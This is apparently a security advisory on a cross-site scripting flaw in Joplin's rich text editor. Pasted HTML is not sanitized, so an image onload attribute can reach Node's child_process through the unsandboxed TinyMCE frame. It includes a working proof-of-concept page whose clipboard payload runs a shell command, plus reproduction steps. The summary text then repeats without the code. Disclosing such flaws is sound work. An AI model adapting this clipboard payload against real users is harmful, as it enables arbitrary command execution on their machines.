Summary
An XSS vulnerability allows pasting untrusted data into the rich text editor to execute arbitrary code.
Details
Currently, HTML pasted into the rich text editor is not sanitized (or not sanitized properly). As such, the onload attribute of pasted images can execute arbitrary code. Because the TinyMCE editor frame does not use the sandbox attribute, such scripts can access NodeJS's require through the top variable. From this, an attacker can run arbitrary commands.
PoC
<!DOCTYPE html>
<html>
<body>
<h1>Select this text & copy it with ctrl+C</h1>
<script>
document.oncopy = evt => {
console.log('oncopy');
evt.clipboardData.setData('text/html', `Evil image: <img onload="document.body.innerHTML += top.require('child_process').exec('ls -la', (err, stdout) => {document.body.innerText = stdout})" src="data:image/svg+xml;base64,PHN2ZyB2aWV3Qm94PSItMjEuNSAtMTAuNSAxMTMgMTE5IiB3aWR0aD0iMTEzIiBoZWlnaHQ9IjExOSIgdmVyc2lvbj0iMS4xIiBiYXNlUHJvZmlsZT0iZnVsbCIgeG1sbnM9Imh0dHA6Ly93d3cudzMub3JnLzIwMDAvc3ZnIj48c3R5bGUgaWQ9ImpzLWRyYXctc3R5bGUtc2hlZXQiPnBhdGh7c3Ryb2tlLWxpbmVjYXA6cm91bmQ7c3Ryb2tlLWxpbmVqb2luOnJvdW5kO310ZXh0e3doaXRlLXNwYWNlOnByZTt9PC9zdHlsZT48cGF0aCBkPSJNOTEuNSwxMDguNWwwLTExOWwtMTEzLDBsMCwxMTlsMTEzLDAiIGZpbGw9IiNmZmZmZmYiIGNsYXNzPSJqcy1kcmF3LWltYWdlLWJhY2tncm91bmQiPjwvcGF0aD48cGF0aCBkPSJNNTUsNDlxMC0xMiAtMTAtMThxLTEwLTUgLTIwLDBxLTEwLDYgLTEwLDE4cTAsMTIgMTAsMThxMTAsNSAyMCwwcTEwLTYgMTAtMTgiIGZpbGw9Im5vbmUiIHN0cm9rZT0iI2ZmNTA1MCIgc3Ryb2tlLXdpZHRoPSIxMyI+PC9wYXRoPjwvc3ZnPg=="/>`);
evt.preventDefault();
}
</script>
</body>
</html>
- Open a page with the above HTML in a web browser.
- Select the heading and copy it
- Paste it into Joplin's rich text editor.
Impact
This is an XSS vulnerability that impacts anyone who pastes untrusted data into the rich text editor.
personalizedrefrigerator Reporter
Summary
An XSS vulnerability allows pasting untrusted data into the rich text editor to execute arbitrary code.
Details
Currently, HTML pasted into the rich text editor is not sanitized (or not sanitized properly). As such, the
onloadattribute of pasted images can execute arbitrary code. Because the TinyMCE editor frame does not use thesandboxattribute, such scripts can access NodeJS'srequirethrough thetopvariable. From this, an attacker can run arbitrary commands.PoC
Impact
This is an XSS vulnerability that impacts anyone who pastes untrusted data into the rich text editor.